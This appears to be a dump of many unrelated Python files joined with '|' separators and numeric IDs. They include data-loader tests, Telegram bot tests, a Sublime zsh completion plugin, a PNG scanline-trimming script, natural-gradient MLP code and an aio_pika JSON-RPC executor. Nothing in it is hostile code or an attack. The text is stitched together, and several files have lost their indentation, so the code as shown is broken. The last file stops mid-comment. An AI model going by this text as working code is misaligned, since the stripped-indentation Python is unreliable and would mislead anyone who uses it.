ARFF_BC = "tests/data/breast_cancer_train.arff"
ARFF_CJS = "tests/data/openml_d_23380.arff"
CSV_CJS_FULL = "tests/data/openml_d_23380.csv"
CSV_CJS = "tests/unit/data/openml_d_23380_500.csv"
CSV_NO_HEADER_CJS = "tests/unit/data/openml_d_23380_500_no_header.csv"
CSV_SEMICOLON_CJS = "tests/unit/data/openml_d_23380_500_semi.csv"
def _test_df_d23380(df):
assert isinstance(df, pd.DataFrame)
assert (2796, 35) == df.shape
assert 68100 == df.isnull().sum().sum()
assert 32 == sum([dtype in NUMERIC_TYPES for dtype in df.dtypes])
assert 3 == sum([dtype.name == "category" for dtype in df.dtypes])
def _test_x_y_d23380(x, y):
""" Test if types are as expected from https://www.openml.org/d/23380 """
assert isinstance(x, pd.DataFrame)
assert (2796, 34) == x.shape
assert 68100 == x.isnull().sum().sum()
assert 32 == sum([dtype in NUMERIC_TYPES for dtype in x.dtypes])
assert 2 == sum([dtype.name == "category" for dtype in x.dtypes])
assert isinstance(y, pd.Series)
assert (2796,) == y.shape
assert 0 == y.isnull().sum()
assert 6 == len(y.dtype.categories)
def _test_df_d23380_500(df):
""" Checks the properties of the subset of 500 rows of the dataset """ ""
assert isinstance(df, pd.DataFrame)
assert (500, 35) == df.shape
assert 12096 == df.isnull().sum().sum()
    # data types are not checked, as the dataset contains too few rows for an
    # accurate reading
class TestXyFromFile:
def test_X_y_from_csv(self):
x, y = X_y_from_file(CSV_CJS_FULL, split_column="TR")
_test_x_y_d23380(x, y)
def test_X_y_from_arff(self):
x, y = X_y_from_file(ARFF_CJS, split_column="TR")
_test_x_y_d23380(x, y)
def test_X_y_from_file_invalid_split_column(self):
with pytest.raises(ValueError, match="No column named NOT_EXIST found"):
X_y_from_file(ARFF_CJS, split_column="NOT_EXIST")
def test_X_y_from_file_default_split_column(self):
_, y = X_y_from_file(ARFF_CJS)
assert y.name == "INTERNODE_29"
class TestLoadFeatureMetadata:
def test_load_feature_metadata_from_arff(self):
meta = load_feature_metadata_from_arff(ARFF_CJS)
assert meta == METADATA_23380
def test_load_feature_metadata_from_arff_whitespace_in_feature_name(self):
meta = load_feature_metadata_from_arff(ARFF_BC)
assert "mean radius" in meta
def test_load_feature_metadata_from_file_arff(self):
meta = load_feature_metadata_from_file(ARFF_CJS)
assert meta == METADATA_23380
def test_load_feature_metadata_from_file_csv(self):
meta = load_feature_metadata_from_file(CSV_CJS)
assert list(meta) == list(METADATA_23380)
assert all(v == "" for v in meta.values())
def test_load_feature_metadata_from_file_txt(self):
with pytest.raises(ValueError, match="files supported."):
load_feature_metadata_from_file("myfile.txt")
class TestLoadCsvHeader:
def test_load_csv_header(self):
header = load_csv_header(CSV_CJS)
assert header == list(METADATA_23380)
def test_load_csv_header_semicolon_delimiter(self):
header = load_csv_header(CSV_SEMICOLON_CJS)
assert header == list(METADATA_23380)
def test_load_csv_header_no_header(self):
header = load_csv_header(CSV_NO_HEADER_CJS)
assert header == [str(i) for i, _ in enumerate(METADATA_23380)]
def test_load_csv_header_wrong_file_type(self):
with pytest.raises(ValueError, match=r"\S+ is not a file with .csv extension."):
load_csv_header(ARFF_CJS)
class TestFileToPandas:
def test_file_to_pandas_csv(self):
df = file_to_pandas(CSV_CJS_FULL)
_test_df_d23380(df)
def test_file_to_pandas_arff(self):
df = file_to_pandas(ARFF_CJS)
_test_df_d23380(df)
def test_file_to_pandas_invalid(self):
with pytest.raises(ValueError, match="files supported."):
file_to_pandas("myfile.txt")
class TestArffToPandas:
def test_arff_to_pandas(self):
dataframe = arff_to_pandas(ARFF_CJS)
_test_df_d23380(dataframe)
class TestCsvToPandas:
def test_csv_to_pandas(self):
df = csv_to_pandas(CSV_CJS_FULL)
_test_df_d23380(df)
def test_csv_to_pandas_semicolon(self):
df = csv_to_pandas(CSV_SEMICOLON_CJS)
assert (500, 35) == df.shape
def test_csv_to_pandas_no_header(self):
df = csv_to_pandas(CSV_NO_HEADER_CJS)
assert (500, 35) == df.shape
class TestSniffCsvMeta:
def test_sniff_csv_meta_with_header(self):
sep, header = sniff_csv_meta(CSV_CJS)
assert "," == sep
assert header
def test_sniff_csv_meta_with_semicolon(self):
sep, header = sniff_csv_meta(CSV_SEMICOLON_CJS)
assert ";" == sep
assert header
def test_sniff_csv_meta_no_header(self):
sep, header = sniff_csv_meta(CSV_NO_HEADER_CJS)
assert "," == sep
assert not header
|
469448
|
import os
import shutil
from test.utils import AbstractCatkinWorkspaceTest, TEMP_DIR, rosinstall, \
create_catkin_workspace
class AbstractUnstableTest(AbstractCatkinWorkspaceTest):
"""
Parent class for any Test case that download latest ros core
stacks from github to build custom stacks against that
"""
def __init__(self, testCaseName, name):
# for ROS core integration tests, we reuse the same sources
# (to save download time), keep in test folder
super(AbstractUnstableTest, self).__init__(
testCaseName, os.path.join(TEMP_DIR, name))
def setupWorkspaceContents(self):
rosinstall(self.workspacedir,
os.path.join(os.path.dirname(__file__),
'test.rosinstall'))
create_catkin_workspace(self.workspacedir)
def tearDown(self):
# override parent tearDown which would delete what we
# rosinstalled
pass
def delete_build(self):
"""
cleans the build folder, run manually in subtests when
appropriate. We don't to this in setup because it takes so
long to build all of ros core'
"""
if os.path.isdir(self.builddir):
shutil.rmtree(self.builddir)
|
469454
|
from pytgbot.exceptions import TgApiServerException
from somewhere import API_KEY, TEST_CHAT
import unittest
from luckydonaldUtils.logger import logging
from pytgbot.bot import Bot
from pytgbot.api_types.receivable.media import PhotoSize
from pytgbot.api_types.receivable.updates import Message
from pytgbot.api_types.sendable.files import InputFileFromURL
from pytgbot.api_types.sendable.input_media import InputMediaPhoto, InputMediaVideo
logging.add_colored_handler(level=logging.DEBUG)
logger = logging.getLogger(__name__)
class BotTest(unittest.TestCase):
def setUp(self):
self.bot = Bot(API_KEY)
self.messages = []
# end def
def test_edit_message_media(self):
# upload by url
url1 = 'https://derpicdn.net/img/view/2012/1/22/1382.jpg'
url2 = 'https://derpicdn.net/img/view/2016/2/3/1079240.png'
msg = self.bot.send_photo(TEST_CHAT, url1, caption="unittest", disable_notification=True)
self.messages.append(msg)
print("msg 1: {!r}".format(msg))
self.assertIsInstance(msg, Message)
self.assertEqual(msg.caption, 'unittest')
self.assertIn('photo', msg)
self.assertIsInstance(msg.photo, list)
msg_id = msg.message_id
file_id = self._get_biggest_photo_fileid(msg)
# edit by url
msg2 = self.bot.edit_message_media(InputMediaPhoto(url2), TEST_CHAT, message_id=msg_id)
self.messages.append(msg2)
print("msg 2: {!r}".format(msg2))
self.assertIsInstance(msg2, Message)
self.assertIn('photo', msg2)
self.assertIsInstance(msg2.photo, list)
self.assertEqual(msg2.caption, None)
file_id2 = self._get_biggest_photo_fileid(msg2)
# edit by file_id
msg3 = self.bot.edit_message_media(InputMediaPhoto(file_id), TEST_CHAT, message_id=msg_id)
self.messages.append(msg3)
print("msg 3: {!r}".format(msg3))
self.assertIsInstance(msg3, Message)
self.assertIn('photo', msg3)
self.assertIsInstance(msg3.photo, list)
file_id3 = self._get_biggest_photo_fileid(msg3)
self.assertEqual(msg2.caption, None)
self.assertEqual(file_id3, file_id)
# edit by upload (url)
msg4 = self.bot.edit_message_media(InputMediaPhoto(InputFileFromURL(url2)), TEST_CHAT, message_id=msg_id)
self.messages.append(msg4)
print("msg 4: {!r}".format(msg4))
self.assertIsInstance(msg4, Message)
self.assertIn('photo', msg4)
self.assertIsInstance(msg4.photo, list)
self.assertEqual(msg4.caption, None)
file_id4 = self._get_biggest_photo_fileid(msg4)
self.messages.append(self.bot.send_message(TEST_CHAT, 'done.'))
# end def
def test_send_media_group(self):
url1 = 'https://derpicdn.net/img/view/2012/1/22/1382.jpg'
url2 = 'https://derpicdn.net/img/view/2016/2/3/1079240.png'
vid1 = 'https://derpicdn.net/img/view/2016/12/21/1322277.mp4'
pic1 = 'https://derpicdn.net/img/2017/7/21/1491832/thumb.jpeg'
stuff = [
InputMediaPhoto(url1, caption='1'),
InputMediaPhoto(InputFileFromURL(url1), caption='2'),
InputMediaVideo(vid1, caption='3'),
InputMediaVideo(InputFileFromURL(vid1), thumb=pic1, caption='4'),
InputMediaVideo(InputFileFromURL(vid1), thumb=InputFileFromURL(pic1), caption='5'),
]
msgs = self.bot.send_media_group(TEST_CHAT, stuff, disable_notification=True, )
self.messages.extend(msgs)
self.messages.append(self.bot.send_message(TEST_CHAT, 'done.'))
# end def
#
# utils:
#
def _get_biggest_photo_fileid(self, msg):
biggest = msg.photo[0]
for photo in msg.photo:
self.assertIsInstance(photo, PhotoSize)
if photo.file_size > biggest.file_size:
biggest = photo
# end if
# end for
return biggest.file_id
# end def
def tearDown(self):
if self.bot and self.messages:
for msg in reversed(self.messages):
try:
self.bot.delete_message(TEST_CHAT, msg.message_id)
except TgApiServerException as e:
if e.error_code == 400 and e.description == 'Bad Request: message to delete not found':
logger.info('delete message fail, not found.')
continue
# end if
logger.debug('delete message fail.', exc_info=True)
# end try
# end for
# end if
self.messages = []
# end def
# end class
if __name__ == '__main__':
unittest.main()
# end def
|
469481
|
from dynamo.tools.connectivity import _gen_neighbor_keys, check_and_recompute_neighbors, check_neighbors_completeness
from utils import *
import networkx as nx
import dynamo as dyn
import matplotlib.pyplot as plt
import numpy as np
def test_neighbors_subset(adata):
dyn.tl.neighbors(adata)
assert check_neighbors_completeness(adata)
indices = np.random.randint(0, len(adata), size=100)
_adata = adata[indices].copy()
assert not check_neighbors_completeness(_adata)
# check obsp keys subsetting by AnnData Obj
neighbor_result_prefix = ""
conn_key, dist_key, neighbor_key = _gen_neighbor_keys(neighbor_result_prefix)
check_and_recompute_neighbors(adata, result_prefix=neighbor_result_prefix)
expected_conn_mat = adata.obsp[conn_key][indices][:, indices]
expected_dist_mat = adata.obsp[dist_key][indices][:, indices]
print("expected_conn_mat:", expected_conn_mat.shape)
conn_mat = _adata.obsp[conn_key]
dist_mat = _adata.obsp[dist_key]
assert np.all(np.abs(expected_conn_mat - conn_mat.toarray()) < 1e-7)
assert np.all(expected_dist_mat == dist_mat.toarray())
# recompute and neighbor graph should be fine
dyn.tl.neighbors(_adata)
assert check_neighbors_completeness(_adata)
def test_broken_neighbors_check_recompute(adata):
dyn.tl.neighbors(adata)
assert check_neighbors_completeness(adata)
indices = np.random.randint(0, len(adata), size=100)
_adata = adata[indices].copy()
assert not check_neighbors_completeness(_adata)
check_and_recompute_neighbors(_adata)
assert check_neighbors_completeness(_adata)
def test_neighbors_no_pca_key():
adata = dyn.sample_data.zebrafish()
dyn.tl.neighbors(adata)
if __name__ == "__main__":
# generate data if needed
adata = gen_or_read_zebrafish_data()
test_neighbors_subset(adata)
test_broken_neighbors_check_recompute(adata)
test_neighbors_no_pca_key()
|
469518
|
def is_alphanumeric(word: str, valid_punctuation_marks: str = '-') -> bool:
"""
Check if a word contains only alpha-numeric
characters and valid punctuation marks.
Parameters
----------
word: `str`
The given word
valid_punctuation_marks: `str`
Punctuation marks that are valid, defaults to `'-'`.
Returns
-------
result: `bool`
The result
"""
    # iterate over the marks one character at a time so every valid mark is stripped
    for punctuation_mark in valid_punctuation_marks:
        word = word.replace(punctuation_mark, '')
return word.isalnum()
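
# Illustrative calls (not part of the original module):
#   is_alphanumeric('state-of-the-art')                         -> True
#   is_alphanumeric('hello!')                                   -> False
#   is_alphanumeric('snake_case', valid_punctuation_marks='_')  -> True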
|
469526
|
from Globals import *
@block
def TextBox(clk, X, Y, Loc, TextColor, charLoc, char, charColor, OEn, Ram, Clear):
x, y,rowNum = (Signal(modbv(0)[WHb:]) for i in range(3))
clrCNT = Signal(modbv(0)[12:0])
@always_seq(clk.posedge, reset=None)
def Seq():
if (x[4:] == 0 and (x >> 4) < 64) and y < 16 * 32:
charLoc.x.next = Loc.x + x
charLoc.y.next = Loc.y + (rowNum << 4)
if (x >> 4) < 64 and y < 16 * 32:
OEn.next = 1
else:
OEn.next = 0
if clrCNT == 2048:
clrCNT.next = 0
elif Clear or clrCNT > 0:
clrCNT.next = clrCNT + 1
else:
clrCNT.next = 0
@always_comb
def Comb():
x.next = X - Loc.x
y.next = Y - Loc.y
charColor.R.next = TextColor.R
charColor.G.next = TextColor.G
charColor.B.next = TextColor.B
@always_comb
def Comb1():
rowNum.next = y >> 4
@always_comb
def Comb2():
if clrCNT > 0:
Ram.we.next = 1
Ram.addr.next = clrCNT - 1
else:
Ram.addr.next = (x >> 4) + (rowNum << 6)
Ram.we.next = 0
char.next = Ram.dout[8:]
Ram.din.next = 0
return instances()
|
469570
|
import pytest
from saq.constants import *
from saq.indicators import Indicator, IndicatorList
from saq.tip import tip_factory
@pytest.mark.unit
def test_indicator_creation():
indicator = Indicator('test_type', 'test_value', status='test_status', tags=['test_tag1', 'test_tag2'])
assert indicator.type == 'test_type'
assert indicator.value == 'test_value'
assert indicator.status == 'test_status'
assert indicator.tags == ['test_tag1', 'test_tag2']
assert indicator.json == {
'type': 'test_type',
'value': 'test_value',
'status': 'test_status',
'tags': [
'test_tag1',
'test_tag2'
]
}
@pytest.mark.unit
def test_indicator_equal():
indicator1 = Indicator('test_type', 'test_value', status='test_status', tags=['test_tag1', 'test_tag2'])
indicator2 = Indicator('test_type', 'test_value')
assert indicator1 == indicator2
@pytest.mark.unit
def test_indicator_from_dict():
indicator_dict = {'type': 'email-src', 'value': '<EMAIL>', 'tags': ['test_tag1', 'test_tag2']}
indicator = Indicator.from_dict(indicator_dict)
assert isinstance(indicator, Indicator)
assert indicator.type == indicator_dict['type']
assert indicator.value == indicator_dict['value']
assert indicator.status == 'New'
assert indicator.tags == indicator_dict['tags']
@pytest.mark.unit
def test_indicatorlist_append():
indicators = IndicatorList()
assert len(indicators) == 0
indicator1 = Indicator('test_type', 'test_value', tags=['test_tag1'])
indicators.append(indicator1)
assert len(indicators) == 1
indicator2 = Indicator('test_type', 'test_value', tags=['test_tag2'])
indicators.append(indicator2)
assert len(indicators) == 1
assert indicators[0].tags == ['test_tag1', 'test_tag2']
@pytest.mark.unit
def test_indicatorlist_url_iocs(tip_misp):
indicators = IndicatorList()
indicators.add_url_iocs('http://www.test.com/index.html')
expected_iocs = [
Indicator(tip_misp.ioc_type_mappings[I_URL], 'http://www.test.com/index.html'),
Indicator(tip_misp.ioc_type_mappings[I_DOMAIN], 'www.test.com'),
Indicator(tip_misp.ioc_type_mappings[I_DOMAIN], 'test.com'),
Indicator(tip_misp.ioc_type_mappings[I_URI_PATH], '/index.html')
]
assert set(indicators) == set(expected_iocs)
|
469580
|
import os
from django.db.models import FilePathField
from django.test import SimpleTestCase
class FilePathFieldTests(SimpleTestCase):
def test_path(self):
path = os.path.dirname(__file__)
field = FilePathField(path=path)
self.assertEqual(field.path, path)
self.assertEqual(field.formfield().path, path)
def test_callable_path(self):
path = os.path.dirname(__file__)
def generate_path():
return path
field = FilePathField(path=generate_path)
self.assertEqual(field.path(), path)
self.assertEqual(field.formfield().path, path)
|
469640
|
from pngparser import PngParser
import sys
def remove_idats(png):
header = png.get_header()
img = png.get_image_data()
height = header.height
rows_count = len(img.scanlines)
print(f"[!] Height: {height}, real size: {rows_count}")
img.scanlines = img.scanlines[:height] # remove data out of image bounds
png.set_image_data(img)
if __name__ == "__main__":
png = PngParser(sys.argv[1])
remove_idats(png)
png.save_file("out.png")
print('[*] Done')
|
469645
|
from pycparser import c_parser, c_ast, c_generator
from copy import deepcopy
def rename_function_calls():
pass
def remove_input_port(func_def, ele_name, inports):
func_def.decl.name = ele_name
func_def.decl.type.type.declname = ele_name
stmts = func_def.body.block_items
new_stmts = []
port2args = {}
for stmt in stmts:
if type(stmt) == c_ast.Decl and type(stmt.init) == c_ast.FuncCall:
funccall = stmt.init
funcname = funccall.name.name
if funcname in inports:
if funccall.args:
raise Exception("Cannot pass an argument when retrieving data from an input port.")
myDecl = deepcopy(stmt)
myDecl.init = None
port2args[funcname] = myDecl
continue
new_stmts.append(stmt)
func_def.body.block_items = new_stmts
params = [port2args[x] for x in inports]
    print(func_def.decl.type.args)
func_def.decl.type.args = c_ast.ParamList(params)
func_def.show()
def test():
src = r'''
run(int xxx) {
int i = in();
out(i+1);
}
'''
parser = c_parser.CParser()
ast = parser.parse(src)
    print(ast.ext)
ast.show()
remove_input_port(ast.ext[0], "element", ["in"])
generator = c_generator.CGenerator()
    print(generator.visit(ast))
test()
|
469654
|
import re
import subprocess
import os
import sublime
import sublime_plugin
import pprint
pp = pprint.PrettyPrinter(indent=4)
def debug_message(msg):
print("[ZSH] " + str(msg))
# Get the current selection range
def sel_start(sel):
return min(sel.a, sel.b)
def sel_end(sel):
return max(sel.a, sel.b)
# Retrieve completion results for the current line
def get_completions(view, prefix):
# Set the working directory for the view
workingDir = None
if view.file_name() != None:
path = os.path.normpath(view.file_name())
workingDir = os.path.dirname(path)
# Get the full content of the line
sel = sel_start(view.sel()[0])
line = view.substr(view.line(sel))
# Build the path to the capture script
script = os.path.normpath(os.path.dirname(__file__)+"/capture.zsh")
# Add each word of the current line as arguments
cmd = [script] + line.split()
# Set process info for windows
info = None
if os.name == 'nt':
info = subprocess.STARTUPINFO()
info.dwFlags |= subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = subprocess.SW_HIDE
# Run the capture script
proc = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, startupinfo=info, cwd=workingDir)
# Get the results from stdout
if proc.stdout:
data = proc.communicate()[0]
if data is None: return None
# Put each line of the results into a list
lines = str(data, encoding='utf8').split("\r\n")
found = []
completions = []
        # Loop through each of the lines
for line in lines:
# The output format is 'word -- description'
bits = line.split(" -- ", 1)
word = bits[0]
# Only include completion results which begin with the characters
# we have entered
if word.find(prefix) == 0:
# If we've already found this word, skip it
if word in found:
continue
# Add the word to the 'found' list so that we can remove duplicates
found.append(word)
# Check if the result has a description, and then add the
# word to the completion list
if len(bits) > 1:
description = bits[1]
completions.append([word+"\t"+description, word])
else:
completions.append([word, word])
return completions
class Listeners(sublime_plugin.EventListener):
def on_query_completions(self, view, prefix, _locations):
sel = sel_start(view.sel()[0])
if view.score_selector(sel, 'source.shell') == 0: return None
if view.score_selector(sel, 'string.quoted') > 0: return None
if view.score_selector(sel, 'comment') > 0: return None
completions = get_completions(view, prefix)
if completions is None: return None
return completions
|
469668
|
import numpy as np
from functools import partial
NG_EXACT = 'exact'
NG_BD = 'block_diagonal'
NG_BTD = 'block_tri_diagonal'
NG_KFAC = 'kfac'
__all__ = [
'init_ntk_mlp',
'forward_and_backward',
'empirical_kernel',
'gradient_mse',
'natural_gradient_mse',
'exact_natural_gradient_mse',
'block_wise_natural_gradient_mse',
'kfac_mse'
]
def activation(inputs, name='relu'):
if name == 'relu':
derivatives = inputs > 0
outputs = inputs * derivatives
return outputs, derivatives
else:
raise ValueError(f'Invalid activation name: {name}.')
def init_ntk_mlp(M3, M2, M1, M0, W_std=1., b_std=0., random_seed=0):
"""Initialize weights and biases of NTK-parameterization."""
np.random.seed(random_seed)
W3 = np.random.randn(M3, M2).astype(np.float32) * W_std / np.sqrt(M2)
W2 = np.random.randn(M2, M1).astype(np.float32) * W_std / np.sqrt(M1)
W1 = np.random.randn(M1, M0).astype(np.float32) * W_std / np.sqrt(M0)
b3 = np.random.randn(M3).astype(np.float32) * b_std
b2 = np.random.randn(M2).astype(np.float32) * b_std
b1 = np.random.randn(M1).astype(np.float32) * b_std
return W3, W2, W1, b3, b2, b1
def forward_and_backward(x, W1, W2, W3, backward=True, kfac=False):
"""
Simple MLP with three layers.
x -> (W1) -> u1 -> (relu) -> h1 -> (W2) -> u2
-> (relu) -> h2 -> (W3) -> f
"""
act_fn = partial(activation, name='relu')
N = x.shape[0]
# forward
u1 = np.einsum('ab,nb->na', W1, x)
h1, d_h1 = act_fn(u1)
del u1
u2 = np.einsum('ab,nb->na', W2, h1)
h2, d_h2 = act_fn(u2)
del u2
f = np.einsum('ab,nb->na', W3, h2)
if not backward:
return f
M3 = W3.shape[0]
# back-propagate Jacobian of fx
if kfac:
J_h2 = W3
J_u2 = np.einsum('ab,nb->nab', J_h2, d_h2)
J_h1 = np.einsum('nab,bc->nac', J_u2, W2)
J_u1 = np.einsum('nab,nb->nab', J_h1, d_h1)
return f, h1, h2, J_u1, J_u2
else:
J_W3 = np.kron(np.eye(M3, dtype=h2.dtype), h2)
J_h2 = W3
J_u2 = np.einsum('ab,nb->nab', J_h2, d_h2)
del J_h2, d_h2
J_W2 = np.einsum('nab,nc->nabc', J_u2, h1).reshape(N * M3, -1)
del h1
J_h1 = np.einsum('nab,bc->nac', J_u2, W2)
del J_u2
J_u1 = np.einsum('nab,nb->nab', J_h1, d_h1)
del d_h1
J_W1 = np.einsum('nab,nc->nabc', J_u1, x).reshape(N * M3, -1)
del J_u1
return f, J_W1, J_W2, J_W3
def empirical_kernel(x1, x2, w_var, W1, W2, W3, ng_type):
_, J_W1_1, J_W2_1, J_W3_1 = forward_and_backward(x1, W1, W2, W3)
if x2 is None:
J_W1_2, J_W2_2, J_W3_2 = J_W1_1, J_W2_1, J_W3_1
N = x1.shape[0]
else:
_, J_W1_2, J_W2_2, J_W3_2 = forward_and_backward(x2, W1, W2, W3)
N = np.sqrt(x1.shape[0] * x2.shape[0])
M0 = W1.shape[-1]
M1 = W2.shape[-1]
M2 = W3.shape[-1]
Th1 = w_var * np.dot(J_W1_1, J_W1_2.T) / (N * M0)
Th2 = w_var * np.dot(J_W2_1, J_W2_2.T) / (N * M1)
Th3 = w_var * np.dot(J_W3_1, J_W3_2.T) / (N * M2)
Th1 = Th1.astype(J_W1_1.dtype)
Th2 = Th2.astype(J_W2_1.dtype)
Th3 = Th3.astype(J_W3_1.dtype)
if ng_type == NG_EXACT:
return Th1 + Th2 + Th3
return Th1, Th2, Th3
def gradient_mse(x, y, w_var, W1, W2, W3):
"""
Gradient.
"""
fx, J_W1, J_W2, J_W3 = forward_and_backward(x, W1, W2, W3)
gx = (fx - y).reshape(-1, 1)
N, M0 = x.shape
M1 = W1.shape[0]
M2 = W2.shape[0]
g1 = np.dot(J_W1.T, gx)
g2 = np.dot(J_W2.T, gx)
g3 = np.dot(J_W3.T, gx)
dW1 = w_var * g1.reshape(W1.shape) / (N * M0)
dW2 = w_var * g2.reshape(W2.shape) / (N * M1)
dW3 = w_var * g3.reshape(W3.shape) / (N * M2)
return dW1, dW2, dW3
def natural_gradient_mse(ng_type, *args, **kwargs):
if ng_type == NG_EXACT:
return exact_natural_gradient_mse(*args, **kwargs)
elif ng_type in [NG_BD, NG_BTD]:
return block_wise_natural_gradient_mse(ng_type, *args, **kwargs)
elif ng_type == NG_KFAC:
return kfac_mse(*args, **kwargs)
else:
raise ValueError(f'Invalid ng_type: {ng_type}.')
def exact_natural_gradient_mse(x, y, w_var, W1, W2, W3, damping):
"""
Exact natural-gradient.
"""
fx, J_W1, J_W2, J_W3 = forward_and_backward(x, W1, W2, W3)
gx = (fx - y).flatten()
N, M0 = x.shape
M1 = W1.shape[0]
M2 = W2.shape[0]
M3 = W3.shape[0]
Th = empirical_kernel(x, None, w_var, W1, W2, W3, NG_EXACT)
I = np.eye(N * M3)
Th += damping * I
Th_inv_dot_gx = np.linalg.solve(Th, gx)
v1 = np.dot(J_W1.T, Th_inv_dot_gx)
v2 = np.dot(J_W2.T, Th_inv_dot_gx)
v3 = np.dot(J_W3.T, Th_inv_dot_gx)
dW1 = w_var * v1.reshape(W1.shape) / (N * M0)
dW2 = w_var * v2.reshape(W2.shape) / (N * M1)
dW3 = w_var * v3.reshape(W3.shape) / (N * M2)
return dW1, dW2, dW3
def block_wise_natural_gradient_mse(ng_type, x, y, w_var, W1, W2, W3, damping):
fx, J_W1, J_W2, J_W3 = forward_and_backward(x, W1, W2, W3)
gx = (fx - y).flatten()
N, M0 = x.shape
M1 = W1.shape[0]
M2 = W2.shape[0]
M3 = W3.shape[0]
# layer-wise empirical kernels
Th1, Th2, Th3 = empirical_kernel(x, None, w_var, W1, W2, W3, ng_type)
if ng_type == NG_BD:
"""
Block-diagonal natural-gradient.
"""
I = np.eye(N * M3)
Th1 += damping * I
Th2 += damping * I
Th3 += damping * I
v1 = np.dot(J_W1.T, np.linalg.solve(Th1, gx))
v2 = np.dot(J_W2.T, np.linalg.solve(Th2, gx))
v3 = np.dot(J_W3.T, np.linalg.solve(Th3, gx))
else:
"""
Block-tridiagonal natural-gradient.
"""
n_layers = 3
O = np.zeros((N * M3, N * M3)).astype(Th1.dtype)
I = np.eye(N * M3 * n_layers).astype(Th1.dtype)
mat = np.block(
[[Th1, Th2, O],
[Th1, Th2, Th3],
[O, Th2, Th3]]
).astype(Th1.dtype)
mat += damping * I
gx = np.stack([gx, gx, gx]).reshape(N * M3 * n_layers, 1)
v = np.linalg.solve(mat, gx)
v = np.split(v, n_layers)
v1 = np.dot(J_W1.T, v[0])
v2 = np.dot(J_W2.T, v[1])
v3 = np.dot(J_W3.T, v[2])
dW1 = w_var * v1.reshape(W1.shape) / (N * M0)
dW2 = w_var * v2.reshape(W2.shape) / (N * M1)
dW3 = w_var * v3.reshape(W3.shape) / (N * M2)
return dW1, dW2, dW3
def kfac_mse(x, y, w_var, W1, W2, W3, damping):
"""
K-FAC.
"""
# only support binary classification
assert y.shape[-1] == 1, 'Only binary classification is supported for K-FAC.'
fx, h1, h2, J_u1, J_u2 = forward_and_backward(x, W1, W2, W3, kfac=True)
gx = fx - y
N, M0 = x.shape
M1 = W1.shape[0]
M2 = W2.shape[0]
J_u1 = J_u1.reshape(-1, M1)
J_u2 = J_u2.reshape(-1, M2)
def get_A_and_B_inv(h, d, M_in, M_out):
# compute damping for A and B
A_dual = (w_var ** 2 / N / M_in) * np.dot(h, h.T)
B_dual = (1 / N) * np.dot(d, d.T)
A_avg_trace = np.trace(A_dual) / M_in
B_avg_trace = np.trace(B_dual) / M_out
pi = np.sqrt(A_avg_trace / B_avg_trace)
I = np.eye(N, N)
A_dmp = I * np.sqrt(damping) * pi
B_dmp = I * np.sqrt(damping) * (1 / pi)
A_inv = np.dot(h.T, np.linalg.inv(np.dot(h, h.T) * (1/N) + A_dmp))
B_inv = np.dot(d.T, np.linalg.inv(np.dot(d, d.T) * (1/N) + B_dmp))
return A_inv, B_inv
A0_inv, B1_inv = get_A_and_B_inv(x, J_u1, M0, M1)
A1_inv, B2_inv = get_A_and_B_inv(h1, J_u2, M1, M2)
dmp = np.eye(N, N) * damping
A2_inv = np.dot(h2.T, np.linalg.inv(np.dot(h2, h2.T) * (1/N) + dmp))
v1 = np.einsum('in,jn,nk->ijk', B1_inv, A0_inv, gx)
v2 = np.einsum('in,jn,nk->ijk', B2_inv, A1_inv, gx)
v3 = np.einsum('jn,nk->jk', A2_inv, gx) * 1/N
dW1 = w_var * v1.reshape(W1.shape) / np.sqrt(M0)
dW2 = w_var * v2.reshape(W2.shape) / np.sqrt(M1)
dW3 = w_var * v3.reshape(W3.shape) / np.sqrt(M2)
return dW1, dW2, dW3
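if __name__ == '__main__':
    # Hedged usage sketch (not part of the original module): compare a plain gradient
    # step with an exact natural-gradient step on random data. The (out, in) weight
    # layout and equal layer widths are assumptions; forward_and_backward and the
    # NG_* constants are defined earlier in this module.
    rng = np.random.default_rng(0)
    N, M = 16, 8
    x = rng.standard_normal((N, M))
    W1 = rng.standard_normal((M, M))
    W2 = rng.standard_normal((M, M))
    W3 = rng.standard_normal((M, M))
    w_var = 1.0
    fx, _, _, _ = forward_and_backward(x, W1, W2, W3)
    y = np.zeros_like(fx)  # target with the same shape as the network output
    dW1, dW2, dW3 = gradient_mse(x, y, w_var, W1, W2, W3)
    ndW1, ndW2, ndW3 = natural_gradient_mse(NG_EXACT, x, y, w_var, W1, W2, W3, damping=1e-3)
    print(dW1.shape, ndW1.shape)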
|
469671
|
import logging
from typing import Any, Dict, Optional
import aio_pika
import pjrpc
logger = logging.getLogger(__package__)
class Executor:
"""
`aio_pika <https://aio-pika.readthedocs.io/en/latest/>`_ based JSON-RPC server.
:param broker_url: broker connection url
:param queue_name: requests queue name
:param prefetch_count: worker prefetch count
:param kwargs: dispatcher additional arguments
"""
def __init__(self, broker_url: str, queue_name: str, prefetch_count: int = 0, **kwargs: Any):
self._broker_url = broker_url
self._queue_name = queue_name
self._prefetch_count = prefetch_count
self._connection = aio_pika.connection.Connection(broker_url)
self._channel: Optional[aio_pika.Channel] = None
self._queue: Optional[aio_pika.Queue] = None
self._consumer_tag: Optional[str] = None
self._dispatcher = pjrpc.server.AsyncDispatcher(**kwargs)
@property
def dispatcher(self) -> pjrpc.server.AsyncDispatcher:
"""
JSON-RPC method dispatcher.
"""
return self._dispatcher
async def start(self, queue_args: Optional[Dict[str, Any]] = None) -> None:
"""
        Starts the executor: connects to the broker, declares the requests queue and begins consuming.
        :param queue_args: queue declaration arguments
"""
await self._connection.connect()
self._channel = await self._connection.channel()
self._queue = await self._channel.declare_queue(self._queue_name, **(queue_args or {}))
await self._channel.set_qos(prefetch_count=self._prefetch_count)
self._consumer_tag = await self._queue.consume(self._rpc_handle)
async def shutdown(self) -> None:
"""
        Stops the executor: cancels the consumer and closes the channel and connection.
"""
if self._consumer_tag:
await self._queue.cancel(self._consumer_tag)
if self._channel:
await self._channel.close()
await self._connection.close()
async def _rpc_handle(self, message: aio_pika.IncomingMessage) -> None:
"""
Handles JSON-RPC request.
:param message: incoming message
"""
try:
reply_to = message.reply_to
response_text = await self._dispatcher.dispatch(message.body, context=message)
if response_text is not None:
if reply_to is None:
logger.warning("property 'reply_to' is missing")
else:
async with self._connection.channel() as channel:
await channel.default_exchange.publish(
aio_pika.Message(
body=response_text.encode(),
reply_to=reply_to,
correlation_id=message.correlation_id,
content_type='application/json',
),
routing_key=reply_to,
)
message.ack()
except Exception as e:
logger.exception("jsonrpc request handling error: %s", e)
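if __name__ == '__main__':
    # Hedged usage sketch (not part of the original module): register a method on the
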